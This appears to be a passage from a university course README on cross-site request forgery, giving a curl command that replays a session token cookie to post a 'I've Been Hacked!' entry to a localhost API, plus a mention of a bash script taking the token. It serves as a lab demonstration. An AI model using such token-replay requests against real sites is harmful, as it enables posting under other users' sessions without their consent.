TzviGreenfeld/BGU-CS/CSRF/CSRF_readme.md

 ```
    curl --cookie 'cookie={"token":"*token*"}' -X POST -H "Content-Type: application/json"  http://localhost:3000/api/post -d '{"title":"Ive Been Hacked!","content":"This post has been sent from another browser!","email":"hacked.com","id":"","link":""}'
 ```

+(there's also a bash script that accepts the token as command-line argument)
 7. The "I've Been Hacked" post should appear on your drafts page.